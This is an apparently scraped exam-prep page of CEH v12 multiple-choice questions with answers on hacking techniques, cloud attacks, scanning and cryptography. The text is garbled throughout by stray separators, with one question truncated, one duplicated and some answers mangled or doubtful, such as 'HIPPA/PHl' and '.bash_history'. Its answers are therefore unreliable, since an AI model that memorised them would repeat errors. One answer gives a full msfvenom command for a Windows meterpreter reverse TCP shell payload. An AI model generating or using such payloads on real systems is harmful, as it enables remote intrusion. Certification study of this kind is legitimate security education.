Download Test v12 CEH QUESTIONS WITH ANSWERS and more Exams Computer Science in PDF only on Docsity!
Test |\v12 |\CEH |\QUESTIONS |\WITH |\
ANSWERS
Susan, |\a |\software |\developer, |\wants |\her |\web |\API |\to |\update |\other |
applications |\with |\the |\latest |\information. |\For |\this |\purpose, |\she |\uses |
a |\user-defined |\HTTP |\tailback |\or |\push |\APIs |\that |\are |\raised |\based |\on |\trigger |\events: |\when |\invoked, |\this |\feature |\supplies |\data |\to |\other |
applications |\so |\that |\users |\can |\instantly |\receive |\real-time |
Information.Which |\of |\the |\following |\techniques |\is |\employed |\by |
Susan? |- |\CORRECT |\ANSWERS |\✔✔Webhooks Andrew |\is |\an |\Ethical |\Hacker |\who |\was |\assigned |\the |\task |\of |
discovering |\all |\the |\active |\devices |\hidden |\by |\a |\restrictive |\firewall |\in |
the |\IPv4 |\range |\in |\a |\given |\target |\network.Which |\of |\the |\following |
host |\discovery |\techniques |\must |\he |\use |\to |\perform |\the |\given |\task? |- |\CORRECT |\ANSWERS |\✔✔arp |\ping |\scan Alice, |\a |\professional |\hacker, |\targeted |\an |\organization's |\cloud |
services. |\She |\infiltrated |\the |\targets |\MSP |\provider |\by |\sending |\spear- phishing |\emails |\and |\distributed |\custom-made |\malware |\to |
compromise |\user |\accounts |\and |\gain |\remote |\access |\to |\the |\cloud |
service. |\Further, |\she |\accessed |\the |\target |\customer |\profiles |\with |\her |
MSP |\account, |\compressed |\the |\customer |\data, |\and |\stored |\them |\in |
the |\MSP. |\Then, |\she |\used |\this |\information |\to |\launch |\further |\attacks |
on |\the |\target |\organization. |\Which |\of |\the |\following |\cloud |\attacks |\did
|\Alice |\perform |\in |\the |\above |\scenario? |- |\CORRECT |\ANSWERS |
✔✔Cloud |\hopper |\attack Annie, |\a |\cloud |\security |\engineer, |\uses |\the |\Docker |\architecture |\to |
employ |\a |\client/server |\model |\in |\the |\application |\she |\is |\working |\on. |
She |\utilizes |\a |\component |\that |\can |\process |\API |\requests |\and |\handle |\various |\Docker |\objects, |\such |\as |\containers, |\volumes. |\Images, |\and |
networks. |\What |\is |\the |\component |\of |\the |\Docker |\architecture |\used |
by |\Annie |\in |\the |\above |\scenario? |- |\CORRECT |\ANSWERS |\✔✔Docker |
daemon what |\is |\the |\correct |\way |\of |\using |\MSFvenom |\to |\generate |\a |\reverse |
TCP |\shellcode |\for |\windows? |- |\CORRECT |\ANSWERS |\✔✔msfvenom |-p |
windows/meterpreter/reverse_tcp |\LHOST=10.10.10.30 |\LPORT=4444 |-f |
exe |> |\shell.exe which |\of |\the |\following |\information |\security |\controls |\creates |\an |
appealing |\isolated |\environment |\for |\hackers |\to |\prevent |\them |\from |
compromising |\critical |\targets |\while |\simultaneously |\gathering |
information |\about |\the |\hacker? |- |\CORRECT |\ANSWERS |\✔✔Honeypot infecting |\a |\system |\with |\malware |\and |\using |\phishing |\to |\gain |
credentials |\to |\a |\system |\or |\web |\application |\are |\examples |\of |\which |
phase |\of |\the |\ethical |\hacking |\methodology? |- |\CORRECT |\ANSWERS |
✔✔Gaining |\access
|\Which |\of |\the |\following |\regulations |\is |\mostly |\violated? |- |\CORRECT |
ANSWERS |\✔✔HIPPA/PHl What |\is |\the |\common |\name |\for |\a |\vulnerability |\disclosure |\program |
opened |\by |\companies |\In |\platforms |\such |\as |\HackerOne? |- |\CORRECT |
ANSWERS |\✔✔Bug |\bounty |\program John |\wants |\to |\send |\Marie |\an |\email |\that |\includes |\sensitive |
information, |\and |\he |\does |\not |\trust |\the |\network |\that |\he |\is |
connected |\to. |\Marie |\gives |\him |\the |\idea |\of |\using |\PGP. |\What |\should |
John |\do |\to |\communicate |\correctly |\using |\this |\type |\of |\encryption? |- |
CORRECT |\ANSWERS |\✔✔Use |\Marie's |\public |\key |\to |\encrypt |\the |
message. Attacker |\Steve |\targeted |\an |\organization's |\network |\with |\the |\aim |\of |
redirecting |\the |\company's |\web |\traffic |\to |\another |\malicious |\website. |
To |\achieve |\this |\goal, |\Steve |\performed |\DNS |\cache |\poisoning |\by |
exploiting |\the |\vulnerabilities |\In |\the |\DNS |\server |\software |\and |
modified |\the |\original |\IP |\address |\of |\the |\target |\website |\to |\that |\of |\a |
fake |\website. |\What |\is |\the |\technique |\employed |\by |\Steve |\to |\gather |
information |\for |\identity |\theft? |- |\CORRECT |\ANSWERS |\✔✔Pharming Wilson, |\a |\professional |\hacker, |\targets |\an |\organization |\for |\financial |
benefit |\and |\plans |\to |\compromise |\its |\systems |\by |\sending |\malicious |
emails. |\For |\this |\purpose, |\he |\uses |\a |\tool |\to |\track |\the |\emails |\of |\the |
target |\and |\extracts |\information |\such |\as |\sender |\identities, |\mall |\
servers, |\sender |\IP |\addresses, |\and |\sender |\locations |\from |\different |
public |\sources. |\He |\also |\checks |\if |\an |\email |\address |\was |\leaked |\using |\the |\haveibeenpwned.com |\API. |\Which |\of |\the |\following |\tools |\is |\used |
by |\Wilson |\in |\the |\above |\scenario? |- |\CORRECT |\ANSWERS |\✔✔infoga While |\testing |\a |\web |\application |\in |\development, |\you |\notice |\that |\the |\web |\server |\does |\not |\properly |\ignore |\the |"dot |\dot |\slash" |(../) |
character |\string |\and |\instead |\returns |\the |\file |\listing |\of |\a |\folder |
structure |\of |\the |\server.What |\kind |\of |\attack |\is |\possible |\in |\this |
scenario? |- |\CORRECT |\ANSWERS |\✔✔Directory |\traversal Henry |\Is |\a |\cyber |\security |\specialist |\hired |\by |\BlackEye |- |\Cyber |
security |\solutions. |\He |\was |\tasked |\with |\discovering |\the |\operating |
system |(OS) |\of |\a |\host. |\He |\used |\the |\Unkornscan |\tool |\to |\discover |\the |\OS |\of |\the |\target |\system. |\As |\a |\result, |\he |\obtained |\a |\TTL |\value, |
which |\Indicates |\that |\the |\target |\system |\is |\running |\a |\Windows |\OS. |
Identify |\the |\TTL |\value |\Henry |\obtained, |\which |\indicates |\that |\the |
target |\OS |\is |\Windows. |- |\CORRECT |\ANSWERS |\✔✔ 128 Ethical |\backer |\jane |\Doe |\is |\attempting |\to |\crack |\the |\password |\of |\the |
head |\of |\the |\it |\department |\of |\ABC |\company. |\She |\Is |\utilizing |\a |
rainbow |\table |\and |\notices |\upon |\entering |\a |\password |\that |\extra |
characters |\are |\added |\to |\the |\password |\after |\submitting. |\What |
countermeasure |\is |\the |\company |\using |\to |\protect |\against |\rainbow |
tables? |- |\CORRECT |\ANSWERS |\✔✔Password |\salting
Bob, |\an |\attacker, |\has |\managed |\to |\access |\a |\target |\loT |\device. |\He |
employed |\an |\online |\tool |\to |\gather |\information |\related |\to |\the |\model |\of |\the |\loT |\device |\and |\the |\certifications |\granted |\to |\it. |\Which |\of |\the |
following |\tools |\did |\Bob |\employ |\to |\gather |\the |\above |\Information? |- |
CORRECT |\ANSWERS |\✔✔FCC |\ID |\search Larry, |\a |\security |\professional |\in |\an |\organization, |\has |\noticed |\some |
abnormalities |\In |\the |\user |\accounts |\on |\a |\web |\server. |\To |\thwart |
evolving |\attacks, |\he |\decided |\to |\harden |\the |\security |\of |\the |\web |
server |\by |\adopting |\a |\countermeasures |\to |\secure |\the |\accounts |\on |
the |\web |\server.Which |\of |\the |\following |\countermeasures |\must |\Larry |
implement |\to |\secure |\the |\user |\accounts |\on |\the |\web |\server? |- |
CORRECT |\ANSWERS |\✔✔Limit |\the |\administrator |\or |\toot-level |\access |
to |\the |\minimum |\number |\of |\users Bella, |\a |\security |\professional |\working |\at |\an |\it |\firm, |\finds |\that |\a |
security |\breach |\has |\occurred |\while |\transferring |\important |\files. |
Sensitive |\data, |\employee |\usernames. |\and |\passwords |\are |\shared |\In |
plaintext, |\paving |\the |\way |\for |\hackers |\perform |\successful |\session |
hijacking. |\To |\address |\this |\situation. |\Bella |\Implemented |\a |\protocol |
that |\sends |\data |\using |\encryption |\and |\digital |\certificates.Which |\of |
the |\following |\protocols |\Is |\used |\by |\Bella? |- |\CORRECT |\ANSWERS |
✔✔FTPS which |\of |\the |\following |\Bluetooth |\hacking |\techniques |\refers |\to |\the |
theft |\of |\information |\from |\a |\wireless |\device |\through |\Bluetooth? |- |
CORRECT |\ANSWERS |\✔✔Bluesnarfing
Dorian |\Is |\sending |\a |\digitally |\signed |\email |\to |\Polly, |\with |\which |\key |\is |\Dorian |\signing |\this |\message |\and |\how |\is |\Poly |\validating |\It? |- |
CORRECT |\ANSWERS |\✔✔Dorian |\is |\signing |\the |\message |\with |\his |
private |\key. |\and |\Poly |\will |\verify |\that |\the |\message |\came |\from |\Dorian |\by |\using |\Dorian's |\public |\key. An |\organization |\has |\automated |\the |\operation |\of |\critical |
infrastructure |\from |\a |\remote |\location. |\For |\this |\purpose, |\all |\the |
industrial |\control |\systems |\are |\connected |\to |\the |\Internet. |\To |
empower |\the |\manufacturing |\process, |\ensure |\the |\reliability |\of |
industrial |\networks, |\and |\reduce |\downtime |\and |\service |\disruption, |
the |\organization |\deckled |\to |\install |\an |\OT |\security |\tool |\that |\further |
protects |\against |\security |\incidents |\such |\as |\cyber |\espionage, |\zero- day |\attacks, |\and |\malware. |\Which |\of |\the |\following |\tools |\must |\the |
organization |\employ |\to |\protect |\its |\critical |\infrastructure? |- |\CORRECT |
ANSWERS |\✔✔Flowmon By |\performing |\a |\penetration |\test, |\you |\gained |\access |\under |\a |\user |
account. |\During |\the |\test, |\you |\established |\a |\connection |\with |\your |
own |\machine |\via |\the |\SMB |\service |\and |\occasionally |\entered |\your |
login |\and |\password |\in |\plaintext.Which |\file |\do |\you |\have |\to |\clean |\to |
clear |\the |\password? |- |\CORRECT |\ANSWERS |\✔✔.bash_history In |\the |\Common |\Vulnerability |\Scoring |\System |(CVSS) |\v3.1 |\severity |
ratings, |\what |\range |\does |\medium |\vulnerability |\fall |\in? |- |\CORRECT |
ANSWERS |\✔✔4.0-6.
above |\scenario? |- |\CORRECT |\ANSWERS |\✔✔Server-side |\request |
forgery |(SSRF) |\attack Dorian |\Is |\sending |\a |\digitally |\signed |\email |\to |\Polly, |\with |\which |\key |\is |\Dorian |\signing |\this |\message |\and |\how |\is |\Poly |\validating |\It? |- |
CORRECT |\ANSWERS |\✔✔Dorian |\is |\signing |\the |\message |\with |\his |
private |\key. |\and |\Poly |\will |\verify |\that |\the |\message |\came |\from |\Dorian |\by |\using |\Dorian's |\public |\key. A |\security |\analyst |\uses |\Zenmap |\to |\perform |\an |\ICMP |\timestamp |
ping |\scan |\to |\acquire |\information |\related |\to |\the |\current |\time |\from |
the |\target |\host |\machine.Which |\of |\the |\following |\Zenmap |\options |
must |\the |\analyst |\use |\to |\perform |\the |\ICMP |\timestamp |\ping |\scan? |- |
CORRECT |\ANSWERS |\✔✔-PP What |\is |\the |\proper |\response |\for |\a |\NULL |\scan |\if |\the |\port |\is |\closed? |- |\CORRECT |\ANSWERS |\✔✔RST
